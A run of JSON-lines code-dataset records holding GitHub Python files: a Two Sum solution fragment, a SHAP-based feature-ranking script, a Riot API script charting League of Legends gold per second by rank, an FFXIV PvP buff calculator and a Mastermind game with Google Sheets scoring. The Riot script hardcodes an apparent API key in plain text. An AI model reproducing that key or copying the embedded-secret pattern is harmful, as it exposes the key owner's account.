value in values:\n return [values[target - value], i]\n else:\n # When said value is not found, add it to\n # the dictionary so you can check next iteration.\n values[value] = i\n\n\nsolution = Solution()\n","repo_name":"denivic/LeetCodeSolutions","sub_path":"(1) - Easy Problems/(1) - Two Sum/Python/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"12110434860","text":"import csv\n\nimport pandas as pd\nimport numpy as np\nimport operator\nimport math\ndef sort_dict(dict_, reverse=True):\n return dict(sorted(dict_.items(), key=operator.itemgetter(1), reverse=reverse))\nclass Ranking:\n @staticmethod\n def rank(data, data2):\n print(data.columns)\n\n # feature_set = set(['race', 'sex', 'age', 'hours-per-week', 'capital-gain', 'capital-loss'])\n # feature_list = ['race', 'sex', 'age', 'hours-per-week', 'capital-gain', 'capital-loss'] #list(feature_set)\n feature_list = ['sex', 'age', 'thalach', 'ca', 'thal', 'exang', 'cp', 'trestbps', 'restecg', 'fbs', 'oldpeak',\n 'chol'] # list(feature_set)\n # feature_list = ['race', 'sex', 'age', 'hours-per-week', 'capital-gain', 'capital-loss'] #list(feature_set)\n #feature_list = ['sex','age','health','Pstatus','nursery','Medu', 'Fjob', 'schoolsup', 'absences', 'activities', 'higher', 'traveltime', 'paid', 'guardian', 'Walc', 'freetime', 'famsup', 'romantic', 'studytime', 'goout', 'reason', 'famrel', 'internet']\n # feature_list = [ 'Sex', 'Age','Job', 'Saving', 'Checking', 'Credit','Housing', 'Purpose']\n feature_list = ['race','sex', 'age', 'c_charge_degree', 'priors_count']\n #feature_list = ['age', 'education', 'job', 'loan', 'balance', 'housing', 'duration', 'campaign', 'default']\n\n\n Swap = data['Swap \\n Percentage'].values\n Measurement = data.Measurement.values\n Feature = data.Feature.values\n SUM_COMBINED = data.SUM_COMBINED.values\n CDI = data.CDI.values\n\n Test_Percent = data2['Test \\n Percentage'].values\n Feature2 = data2.Feature.values\n Shap_Value = data2.Value.values\n\n data_file = open(path_output2 + 'Ranking-value-{}.csv'.format(data_name),\n mode='w', newline='',\n encoding='utf-8')\n data_writer = csv.writer(data_file)\n data_writer.writerow(['Distance_Measure','Feature', 'Distance_Rank', 'Shap_Rant', 'Difference'])\n\n data_file2 = open(path_output2 + 'Stability-shap-{}.csv'.format(data_name),\n mode='w', newline='',\n encoding='utf-8')\n data_writer2 = csv.writer(data_file2)\n data_writer2.writerow(['Measures','Rank_CDI_SHAP', 'Rank_Double_SHAP'])\n set_Measurement = ['Hellinger\\n distance', 'Jensen-Shannon\\n divergence', 'Total variation\\n distance',\n 'Wasserstein\\n distance'] # set(Measurement)\n\n rank_data_shap = {}\n for i in range(len(Feature2)):\n if Test_Percent[i] == '50%':\n rank_data_shap[Feature2[i]] = Shap_Value[i]\n prev_shap = -1\n rank_index = 0\n rank_data_shap2 = {}\n sorted_data_shap = sort_dict(rank_data_shap, reverse=True)\n for key, val in sorted_data_shap.items():\n if val != prev_shap:\n rank_index += 1\n rank_data_shap2[key] = rank_index\n\n rank_data = {}\n rank_data_ = {}\n for i in range(len(Feature)):\n if Swap[i] == '50%':\n if Measurement[i] in rank_data.keys():\n rank_data[Measurement[i]][Feature[i]] = SUM_COMBINED[i]\n rank_data_[Measurement[i]][Feature[i]] = CDI[i]\n else:\n rank_data[Measurement[i]] = {}\n rank_data[Measurement[i]][Feature[i]] = SUM_COMBINED[i]\n\n rank_data_[Measurement[i]] = {}\n rank_data_[Measurement[i]][Feature[i]] = CDI[i]\n 
#print(Swap)\n #for measure_2 in set_Measurement:\n rank_data2_ = {}\n for key, val in rank_data_.items():\n sorted_data = sort_dict(val, reverse=True)\n #print(key, sorted_data)\n rank_data2_[key] = {}\n index = 0\n prev_val = -1\n for key2, val2 in sorted_data.items():\n if val2 != prev_val:\n prev_val = val2\n index += 1\n rank_data2_[key][key2] = index\n\n rank_data2 = {}\n\n for key, val in rank_data.items():\n sorted_data = sort_dict(val, reverse=True)\n #print(key, sorted_data)\n rank_data2[key] = {}\n index = 0\n prev_val = -1\n for key2, val2 in sorted_data.items():\n if val2 != prev_val:\n prev_val = val2\n index += 1\n rank_data2[key][key2] = index\n Feature_set = set(Feature)\n m = len(Feature_set)\n print(set_Measurement)\n\n for measure_1 in set_Measurement:\n #val = rank_data.get(measure_1)\n row = [measure_1]\n val_ = []\n sum_rank = 0\n sum_rank_single = 0\n for key2 in feature_list:\n val2 = rank_data[measure_1][key2]\n #for key2, val2 in rank_data[measure_1].items():\n sum_rank += (math.pow((rank_data2[measure_1][key2] - rank_data_shap2[key2]), 2)) / (\n m * (math.pow(m, 2) - 1))\n sum_rank_single += (math.pow((rank_data2_[measure_1][key2] - rank_data_shap2[key2]), 2)) / (\n m * (math.pow(m, 2) - 1))\n data_writer.writerow([measure_1, key2, rank_data2[measure_1][key2], rank_data_shap2[key2], abs((rank_data2[measure_1][key2] - rank_data_shap2[key2]))])\n row.append(1 - round(sum_rank_single,3))\n row.append(1 - round(sum_rank,3))\n data_writer2.writerow(row)\n\n\nif __name__ == '__main__':\n path = '../../../dataset/'\n alpha = 0.3\n #clevelan_heart\n data_name = 'compas-{}_'.format(alpha) # _35_threshold\n path_output = 'logging3/{}/'.format(data_name)\n path_output2 = '/Volumes/Cisco/Fall2022/Fairness/Analysis/Ranking/Shap/'\n data = pd.read_csv(path+path_output +'/processed'+'/Correlated_features_{}.csv'.format(data_name))\n data2 = pd.read_csv(path + path_output + '/processed' + '/Shap_importance_{}.csv'.format(data_name))\n ranking = Ranking.rank(data, data2)","repo_name":"openjamoses/Data-swapping","sub_path":"src/models/v4/analysis/ranking/Rank_measures_shap_importance.py","file_name":"Rank_measures_shap_importance.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"37588917809","text":"\r\nfrom re import S\r\nfrom riotwatcher import LolWatcher, ApiError\r\nimport pandas as pd\r\nimport json\r\nimport pprint\r\nfrom os.path import exists\r\nfrom pathlib import Path\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.ticker as mticker \r\n# global variables\r\napi_key = 'RGAPI-9945c54d-8e0f-4e0f-929c-4abe631c6e74'\r\nwatcher = LolWatcher(api_key)\r\nmy_region = 'na1'\r\n\r\n\r\nwith open('summoners.json') as f:\r\n data = json.load(f)\r\nkeys = data.keys()\r\nvalues = data.values()\r\n\r\nsummoner_ids = {'challenger' : [],\r\n'grandmaster' : [],\r\n'master' : [],\r\n'diamond' : [],\r\n'platinum' : [],\r\n'gold' : [],\r\n'silver' : [],\r\n'bronze' : [],\r\n'iron' : []}\r\nif not exists('summoner_ids.json'):\r\n for key in summoner_ids.keys():\r\n summoners = data[key]\r\n for summoner in summoners:\r\n summoner_ids[key].append(watcher.summoner.by_name(my_region, summoner)['puuid'])\r\n with open('summoner_ids.json','w') as f:\r\n json.dump(summoner_ids,f)\r\nelse:\r\n with open('summoner_ids.json') as f:\r\n summoner_ids = json.load(f)\r\n\r\ngame_times = {'challenger' : [],\r\n'grandmaster' : [],\r\n'master' : [],\r\n'diamond' : [],\r\n'platinum' : 
[],\r\n'gold' : [],\r\n'silver' : [],\r\n'bronze' : [],\r\n'iron' : []}\r\n\r\nmatch_list = {'challenger' : [],\r\n'grandmaster' : [],\r\n'master' : [],\r\n'diamond' : [],\r\n'platinum' : [],\r\n'gold' : [],\r\n'silver' : [],\r\n'bronze' : [],\r\n'iron' : []}\r\nif not exists('match_list.json'):\r\n for key in match_list.keys():\r\n ids = summoner_ids[key]\r\n for id in ids:\r\n match_list[key].append(watcher.match.matchlist_by_puuid('americas',id,0,50,420))\r\n with open('match_list.json','w') as f:\r\n json.dump(match_list,f)\r\nelse:\r\n with open('match_list.json') as f:\r\n match_list = json.load(f)\r\n\r\nif not exists('game_times.json'):\r\n for key in game_times.keys():\r\n match_ids = match_list[key]\r\n for ids in match_ids:\r\n for id in ids:\r\n print(id)\r\n game_times[key].append(watcher.match.by_id('americas', id)['info']['participants'][0]['timePlayed'])\r\n with open('game_times.json','w') as f:\r\n json.dump(game_times,f)\r\nelse:\r\n with open('game_times.json') as f:\r\n game_times = json.load(f)\r\npositions = ['TOP','JUNGLE',\"MIDDLE\",'BOTTOM','UTILITY']\r\ngepp = {\r\n 'challenger' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'grandmaster' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'master' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'diamond' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'platinum' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'gold' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'silver' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'bronze' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'iron' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n }\r\n}\r\npath = Path(r'matches')\r\nfiles = list(path.glob('NA1_??????????.json'))\r\nrecorded_id = []\r\nfor file in files:\r\n file_str = str(file)\r\n recorded_id.append(file_str[file_str.find('NA1'):file_str.find('NA1')+14])\r\n\r\n\r\n\r\nfor key in game_times.keys():\r\n match_ids = match_list[key]\r\n for ids in match_ids:\r\n for id in ids:\r\n \r\n if id not in recorded_id:\r\n print(id)\r\n match = watcher.match.by_id('americas', id)\r\n match['tier'] = key\r\n with open(str(path)+'\\\\'+id+'.json','w') as f:\r\n json.dump(match,f)\r\n f.close()\r\nfor file in files:\r\n with open(file,encoding='ascii') as f:\r\n match = json.load(f)\r\n for i in range(10):\r\n tier = match['tier']\r\n for position in positions:\r\n if position == match['info']['participants'][i]['teamPosition']:\r\n gold = match['info']['participants'][i]['goldEarned']\r\n time = match['info']['participants'][i]['timePlayed']\r\n gps = gold/time\r\n gepp[tier][position].append(gps)\r\n f.close()\r\n \r\n \r\n \r\n\r\ngps_avg = {\r\n 'challenger' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'grandmaster' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'master' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'diamond' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' 
: 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'platinum' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'gold' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'silver' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'bronze' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'iron' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n }\r\n}\r\n\r\nfor key in gps_avg.keys():\r\n for position in positions:\r\n total = 0\r\n for dict in gepp[key][position]:\r\n total += dict\r\n avg = total / len(gepp[key][position])\r\n gps_avg[key][position] = avg\r\n\r\n\r\n\r\ngame_time_avg = {'challenger' : 0,\r\n'grandmaster' : 0,\r\n'master' : 0,\r\n'diamond' : 0,\r\n'platinum' : 0,\r\n'gold' : 0,\r\n'silver' : 0,\r\n'bronze' : 0,\r\n'iron' : 0}\r\ntotal = 0\r\nfor key in game_times.keys():\r\n for time in game_times[key]:\r\n total += time\r\n avg = round((total / len(game_times[key])))\r\n game_time_avg[key] = [avg,f'{avg//60}m {avg%60}s']\r\n \r\n total = 0\r\ntiers = ['challenger', 'grandmaster', 'master', 'diamond', 'platinum', 'gold','silver','bronze','iron']\r\ngpss = {}\r\n# for tier in tiers:\r\n# print(tier + \": \"+game_time_avg[tier][1])\r\nfor position in positions:\r\n print(position + ':\\n')\r\n gpss[position]=[]\r\n for tier in tiers[::-1]:\r\n print(' '+ tier + ': '+str(gps_avg[tier][position]))\r\n gpss[position].append(gps_avg[tier][position])\r\n print('\\n')\r\n\r\nfig, ax = plt.subplots() \r\nplt.figure(1) \r\nfor key in gpss.keys():\r\n plt.plot([item.upper() for item in tiers[::-1]],gpss[key],label = key)\r\nplt.xticks(rotation=90)\r\n\r\nplt.xlabel('Divisions')\r\nplt.ylabel('Gold Per Second')\r\nplt.title('GPS for different divisions')\r\nplt.legend()\r\nplt.tight_layout()\r\nplt.figure(2)\r\n\r\ngame_time_avg_list = []\r\ngame_time_avg_listf = []\r\nfor tier in tiers[::-1]:\r\n game_time_avg_list.append(game_time_avg[tier][0])\r\n game_time_avg_listf.append(game_time_avg[tier][1])\r\nplt.bar([item.upper() for item in tiers[::-1]],game_time_avg_list)\r\nplt.xticks(rotation=90)\r\nplt.xlabel('Divisions')\r\nplt.ylabel('Game time')\r\nplt.title('Average game time for different divisions')\r\n# plt.yticks(game_time_avg_listf)\r\nprint(game_time_avg_list)\r\ndef minsecs(x,pos=None):\r\n return f'{int(x//60)}m {int(x%60)}s'\r\nplt.ylim(1500,1850)\r\nplt.gca().yaxis.set_major_formatter(mticker.FuncFormatter(minsecs))\r\nplt.legend()\r\nplt.tight_layout()\r\n\r\nplt.show()","repo_name":"zealotwithcharge/hw_02","sub_path":"hw_02.py","file_name":"hw_02.py","file_ext":"py","file_size_in_byte":8078,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"43"} +{"seq_id":"42383385514","text":"mubiaozhiyebuzheng = { # 目标职业增伤补正\n 0: 1, # 好像是木桩\n 19: 0.7, # 'Paladin', # 骑士PLD\n 20: 0.7, # 'Monk', # 武僧MNK\n 21: 0.7, # 'Warrior', # 战士WAR\n 22: 0.75, # 'Dragoon', # 龙骑士DRG\n 23: 1, # 'Bard', # 吟游诗人BRD\n 24: 1, # 'WhiteMage', # 白魔法师WHM\n 25: 1, # 'BlackMage', # 黑魔法师BLM\n # 26: #'Arcanist', # 秘术师ACN\n 27: 1, # 'Summoner', # 召唤师SMN\n 28: 1, # 'Scholar', # 学者SCH\n 30: 0.75, # 'Ninja', # 忍者NIN\n 31: 1, # 'Machinist', # 机工士MCH\n 32: 0.7, # 'DarkKnight', # 暗黑骑士DRK\n 33: 1, # 'Astrologian', # 占星术士AST\n 34: 0.7, # 'Samurai', # 武士SAM\n 35: 0.8, # 'RedMage', # 赤魔法师RDM\n # 36: #'BlueMage', # 青魔BLM\n 
37: 0.7, # 'Gunbreaker', # 绝枪战士GNB\n 38: 1, # 'Dancer', # 舞者DNC\n}\nzijizhiyebuzheng = { # 自己职业增伤补正\n 19: 1.15, # 'Paladin', # 骑士PLD\n 20: 1.15, # 'Monk', # 武僧MNK\n 21: 1.15, # 'Warrior', # 战士WAR\n 22: 1.15, # 'Dragoon', # 龙骑士DRG\n 23: 1, # 'Bard', # 吟游诗人BRD\n 24: 1, # 'WhiteMage', # 白魔法师WHM\n 25: 1, # 'BlackMage', # 黑魔法师BLM\n # 26: #'Arcanist', # 秘术师ACN\n 27: 1, # 'Summoner', # 召唤师SMN\n 28: 1, # 'Scholar', # 学者SCH\n 30: 1.15, # 'Ninja', # 忍者NIN\n 31: 1, # 'Machinist', # 机工士MCH\n 32: 1.15, # 'DarkKnight', # 暗黑骑士DRK\n 33: 1, # 'Astrologian', # 占星术士AST\n 34: 1.15, # 'Samurai', # 武士SAM\n 35: 1, # 'RedMage', # 赤魔法师RDM\n # 36: #'BlueMage', # 青魔BLM\n 37: 1.15, # 'Gunbreaker', # 绝枪战士GNB\n 38: 1, # 'Dancer', # 舞者DNC\n}\n\n# 目标的易伤buff\nmubiaozengshang10 = [\n 2035, # 天辉\n 2014, # 攻其不备\n 2077, # 狂魂\n 2078, # 混沌旋风\n 2019, # 毒菌冲击\n 2066, # 近战被枪刃抽取\n]\nmubiaozengshang20 = [\n 1896, # 幻影弹\n]\nmubiaozengshang25 = [\n 1408, # 法系LB\n]\n# 目标的减伤buff\nmubiaojianshang10 = [\n 2178, # 大地神的抒情恋歌\n 2038, # 节制群体buff\n 2034, # 占卜\n 2172, # 亲疏自行自身buff\n 2061, # 原初的勇猛\n 2062, # 原初的武猛\n 2052, # 扇舞·急\n 2177, # 策动\n 2006, # 金刚体势\n 2171, # 暗黑布道\n 2063, # 枪刃抽近融合\n]\nmubiaojianshang20 = [\n 1452, # 王冠之贵妇\n 2053, # 护盾\n 1978, # 铁壁\n]\nmubiaojianshang25 = [\n 655, # TLB\n]\nmubiaojianshang30 = [\n 2020, # 干预 没有铁壁附加效果只有20 但是两个buff是一样的 按高的算\n]\nmubiaojianshang50 = [\n 1240, # 必杀剑·地天\n # 抵消伤害的盾,我不会查盾值,先全当作50%减伤算\n # 1308, # 至黑之夜\n # 1997, # 残暴弹\n # 2179, # 掩护盾\n # 2011, # 缩地\n # 1993, # 摆脱\n # 2071, # 天星冲日\n # 2043, # 中间学派状态下奶出的盾\n # 2033, # 交剑\n # 1989, # 魔罩\n # 1331, # 鼓舞\n # 2008, # 金刚极意\n]\n# 自身的加伤害buff\nzijizengshang5 = [\n 2215, # 放浪神的小步舞曲\n]\nzijizengshang10 = [\n 2034, # 占卜\n 2022, # 剑舞\n 2005, # 红莲体势\n 1183, # 巨龙右眼 自身\n 1184, # 巨龙左眼 目标\n 2064, # 枪刃抽远融合\n]\nzijizengshang20 = [\n 1451, # 王冠之领主\n 2037, # 节制自己的buff\n]\n# 自身受到的减少伤害buff\nzijijianshang10 = [\n 2076, # 悔罪\n 2181, # 亲疏自行反弹buff\n 2067, # 远程被枪刃抽取\n]\nzijijianshang20 = [\n 2101, # 雪仇\n]\nzijijianshang40 = [\n 1988, # 昏乱\n]\n\n\n# 2282 鼓励 随时间衰减的10% 2173 2174 武僧义结金兰的两个buff不知道哪个是5%增伤 同时出现结束 而且只有物理增伤 这两个比较怪而且少见 先不管\n# 2185 牵制 不会查buff是不是自己上的 自己上没有增伤 先不管\n# 获取buff持续时间是\n# teffects[effect_id].timer\n# 获取buff来源是\n# teffects[effect_id].actorId\n\ndef get_buff(actor):\n # info(f\"{target.job.name\")\n # info(f\"{target.job.raw_value}\")\n # info(f\"{target.job.value()\")\n # info(f\"{data.effects}\")\n # info(f\"{target.effects.get_dict()}\")\n b = 1\n effect = actor.effects.get_dict()\n for i in range(2131, 2136):\n if i in effect:\n b += 0.1 * (i - 2130)\n break\n for i in zijizengshang5:\n if i in effect:\n b *= 1.05\n for i in zijizengshang10:\n if i in effect:\n b *= 1.1\n for i in zijizengshang20:\n if i in effect:\n b *= 1.2\n for i in zijijianshang10:\n if i in effect:\n b *= 0.9\n for i in zijijianshang20:\n if i in effect:\n b *= 0.8\n for i in zijijianshang40:\n if i in effect:\n b *= 0.6\n return b * 0.95\n\n\ndef get_tbuff(target): # 目标的有效生命\n c = 1\n c /= mubiaozhiyebuzheng[target.job.raw_value]\n teffects = target.effects.get_dict()\n if 1302 in teffects:\n return 0\n for i in mubiaozengshang10:\n if i in teffects:\n c /= 1.1\n for i in mubiaozengshang20:\n if i in teffects:\n c /= 1.2\n for i in mubiaozengshang25:\n if i in teffects:\n c /= 1.25\n for i in mubiaojianshang10:\n if i in teffects:\n c /= 0.9\n for i in mubiaojianshang20:\n if i in teffects:\n c /= 0.8\n for i in mubiaojianshang30:\n if i in teffects:\n c /= 0.7\n for i in mubiaojianshang50:\n if i in teffects:\n c /= 0.5\n\n return 
c\n","repo_name":"nyouoG/fpt_plugins","sub_path":"XivCombat2/PvpDmgBuff.py","file_name":"PvpDmgBuff.py","file_ext":"py","file_size_in_byte":5612,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"43"}
{"seq_id":"4048762983","text":"import gspread\nimport random\nfrom os import system\nimport sys\nimport time\nfrom google.oauth2.service_account import Credentials\nfrom colorama import Fore\nfrom operator import itemgetter\n\nSCOPE = [\n \"https://www.googleapis.com/auth/spreadsheets\",\n \"https://www.googleapis.com/auth/drive.file\",\n \"https://www.googleapis.com/auth/drive\"\n ]\n\nCREDS = Credentials.from_service_account_file('creds.json')\nSCOPED_CREDS = CREDS.with_scopes(SCOPE)\nGSPREAD_CLIENT = gspread.authorize(SCOPED_CREDS)\nSHEET = GSPREAD_CLIENT.open('score')\n\n\ncolor_list = ['Red', 'Green', 'Blue', 'Purple', 'Yellow', 'White', 'Cyan']\ncolor_list_map = {'R': 'Red', 'G': 'Green', 'B': 'Blue', 'P': 'Purple',\n 'Y': 'Yellow', 'W': 'White', 'C': 'Cyan'}\nunknown = []\nguess_code = []\nattempts = 8\ninput_store = {0: guess_code}\nclue = {0: [0, 0]}\nplayer_name = ''\nscore = 0\n\n\nclass Score:\n \"\"\"\n Class to store score details in spreadsheet\n \"\"\"\n def __init__(self, name, score, level):\n self.name = name\n self.score = score\n self.level = level\n\n def update(self):\n level_str = ''\n if self.level == 1:\n level_str = 'easy'\n elif self.level == 2:\n level_str = 'medium'\n elif self.level == 3:\n level_str = 'difficult'\n data = [self.name, self.score, level_str]\n score_sheet = SHEET.worksheet('score')\n score_sheet.append_row(data)\n\n\ndef reset_variables():\n \"\"\"\n Resets global variables when user wants to play again,\n aim is to not repeat or store incorrect values in spreadsheet\n \"\"\"\n global unknown\n unknown = []\n global guess_code\n guess_code = []\n global input_store\n input_store = {0: guess_code}\n global clue\n clue = {0: [0, 0]}\n\n\ndef clear_screen():\n \"\"\"\n Clears the screen\n \"\"\"\n system('clear')\n\n\ndef continue_to_main():\n \"\"\"\n This function takes the user back to the main menu\n \"\"\"\n print(\"Press 'C' or 'c' to continue...\")\n while True:\n key = input('\\n')\n if (key.upper() == 'C'):\n main()\n break\n else:\n print(\"Invalid input, Try again!\")\n continue\n\n\ndef welcome_banner():\n \"\"\"\n Prints welcome heading on top of the screen\n \"\"\"\n welcome = '{:^80}'\n print(\"*\" * 80)\n print()\n print(Fore.RED + welcome.format(\"MASTERMIND - CODE BREAKER\")\n + Fore.RESET + '\\n')\n print(\"*\" * 80)\n\n\ndef player_namef():\n \"\"\"\n Takes username input\n \"\"\"\n name = '{:^80}'\n print('\\n\\n\\n')\n print(Fore.RED + name.format('Enter your first name:') + Fore.RESET)\n print(' '*37, end=\"\")\n global player_name\n while True:\n try:\n player_name = input()\n if not player_name.isalpha():\n raise ValueError(f\"Enter a valid name.\")\n else:\n break\n except ValueError as e:\n print(f\"Invalid input: {e}!\")\n return True\n\n\ndef create_color_code(color_list, choice):\n \"\"\"\n Creates the color code for user to guess\n \"\"\"\n if choice == 1:\n random_color_code = random.sample(color_list, k=3)\n elif choice == 2:\n random_color_code = random.sample(color_list, k=4)\n elif choice == 3:\n random_color_code = random.sample(color_list, k=5)\n append_unknown_list(choice)\n return random_color_code\n\n\ndef append_unknown_list(k):\n \"\"\"\n Appends '***' and '---' for the game board\n according to the user choice\n \"\"\"\n for i in range(2+k):\n unknown.append(\"***\")\n 
guess_code.append('---')\n\n\ndef game_board(unknown):\n \"\"\"\n Prints game board for the play\n \"\"\"\n welcome1 = '{:^80}'\n print(\"*\" * 80)\n print()\n print(Fore.RED + welcome1.format('GAME BOARD') + Fore.RESET + '\\n')\n print(\"*\" * 80)\n print(\"\\n\")\n for i in range(len(unknown)):\n unknown[i] = Fore.RED + str(unknown[i]) + Fore.RESET\n print(\"The secret Color code is: \", end=\"\")\n print(*unknown, sep=\" \")\n print()\n\n\ndef add_rank(j, rank, color):\n \"\"\"\n Add ranks to the updated scoreboard\n \"\"\"\n print(color + ' '*22, end=\"\")\n print(f\"{j[0]+rank:16}\", end=\"\")\n print(f\"{j[1]:<17}\", end=\"\")\n print(f\"{j[2]}\")\n\n\ndef leaderboard():\n \"\"\"\n Prints the scoreboard (top 10) after a game is finished\n \"\"\"\n clear_screen()\n game_board = '{:^80}'\n print(\"*\" * 80)\n print()\n print(Fore.RED + game_board.format('SCOREBOARD') + Fore.RESET + '\\n')\n print(\"*\" * 80)\n print('\\n')\n score_sheet = SHEET.worksheet('score').get_all_values()\n score_sheet_headings = score_sheet[0]\n score_values = score_sheet[1:]\n for i in score_values:\n i[1] = int(i[1])\n new_ssh = ' '.join(score_sheet_headings).upper()\n underlined_text = \"\\x1B[4m\" + new_ssh + \"\\x1B[0m\"\n print(Fore.RED + underlined_text.center(90, ' ') + Fore.RESET + '\\n')\n sorted_list = sorted(score_values, key=itemgetter(1), reverse=True)\n for j in sorted_list[0:10]:\n if sorted_list.index(j) == 0:\n add_rank(j, '(1)', Fore.YELLOW)\n elif sorted_list.index(j) == 1:\n add_rank(j, '(2)', Fore.BLUE)\n elif sorted_list.index(j) == 2:\n add_rank(j, '(3)', Fore.GREEN)\n else:\n add_rank(j, '', Fore.RESET)\n continue_to_main()\n\n\ndef guess_attempts(attempts, unknown, color_passcode, choice):\n \"\"\"\n Prints attempts detail on the screen after each attempt\n made by the user\n \"\"\"\n count = 0\n flag = 0\n while True:\n game_board(unknown)\n for key in input_store:\n print(\" \"*10, end=\"\")\n print(f\"| Attempt: {key}\", end=\" \")\n print(f'Hits: {clue[key][0]}, Misses: {clue[key][1]}', end=\" \")\n dict_list = input_store[key]\n print(*dict_list, sep=\" \")\n if check_result(count, attempts, key, choice, color_passcode):\n pass\n count += 1\n if count == attempts+1:\n check_result(count, attempts, key, choice, color_passcode)\n color_input = take_input(count, choice)\n compare_colors(color_passcode, color_input, count)\n clear_screen()\n\n\ndef check_result_if(print_string, flag, count, attempt, key,\n choice, color_passcode):\n print(\"wait. . .\")\n time.sleep(2.5)\n clear_screen()\n game_board(color_passcode)\n print(Fore.BLUE + print_string)\n cal_score(count, flag)\n print(Fore.RESET)\n score_obj = Score(player_name, score, choice)\n score_obj.update()\n continue_to_main()\n\n\ndef check_result(count, attempt, key, choice, color_passcode):\n \"\"\"\n Checks result when user enters a guess,\n this function compares the user guess with\n the random code generated\n \"\"\"\n if count == attempt+1:\n print_string = f\"You ran out of attempts! Better luck next time...\\n\\n\"\n check_result_if(print_string, 1, count, attempt, key,\n choice, color_passcode)\n\n if clue[key][0] == choice+2:\n print_string = f\"CONGRATULATIONS! 
You broke the code in {count}\\ attempt(s), Nice work!!!\\n\\n\"\n check_result_if(print_string, 0, count, attempt, key, choice,\n color_passcode)\n\n return False\n\n\ndef cal_score(count, flag):\n \"\"\"\n This function calculates the score based on the count of attempts\n a code is cracked or could not be cracked under 8 attempts\n \"\"\"\n global score\n if flag == 1:\n score = 0\n print(f\"Your score: {score} \")\n return score\n else:\n score = (10-(count-1))*10\n print(f\"Your score: {score} \")\n\n\ndef take_input(count, choice):\n \"\"\"\n Takes input (code guess) from the user\n \"\"\"\n length = choice + 2\n print(f\"\\nEnter code consisting of {length} colors.\")\n print(f\"Example -> r/R for Red, b/B for Blue with whitespace.\\\n Don't repeat colors.\")\n print(f\"Color choices: ['Red', 'Green', 'Blue', 'Purple',\\\n 'Yellow', 'White','Cyan']\")\n print(f\"For main menu -> type 'menu', to exit -> type 'exit'\\n\")\n while True:\n color_string = input('\\n').upper()\n color_code_list = color_string.split()\n\n if validate_input(color_code_list, length):\n break\n color_input = []\n for color in color_code_list:\n color_input.append(color_list_map[color])\n input_store[count] = color_input\n return color_input\n\n\ndef validate_input(color_code_list, length):\n \"\"\"\n Validates the color code input against duplicate values,\n non-string values, more or less color codes than required\n \"\"\"\n flag_1 = 0\n flag_2 = 0\n if color_code_list == ['MENU']:\n continue_to_main()\n\n if color_code_list == ['EXIT']:\n sys.exit(0)\n try:\n if len(color_code_list) != length:\n raise ValueError(f\"Exactly {length} values required,\\\n you provided {len(color_code_list)}\")\n except ValueError as e:\n print(f\"Invalid input: \\n{e}! Type again...\\n\")\n return False\n for color in color_code_list:\n if color not in ['R', 'G', 'B', 'P', 'Y', 'W', 'C']:\n flag_1 = 1\n if flag_1 == 1:\n print(f\"Invalid input: \\nChoose as described in instructions!\\\n Type again...\\n\")\n return False\n\n for color in color_code_list:\n num = color_code_list.count(color)\n if num > 1:\n flag_2 = 1\n if flag_2 == 1:\n print(f\"Invalid input: \\nDo not repeat colors! 
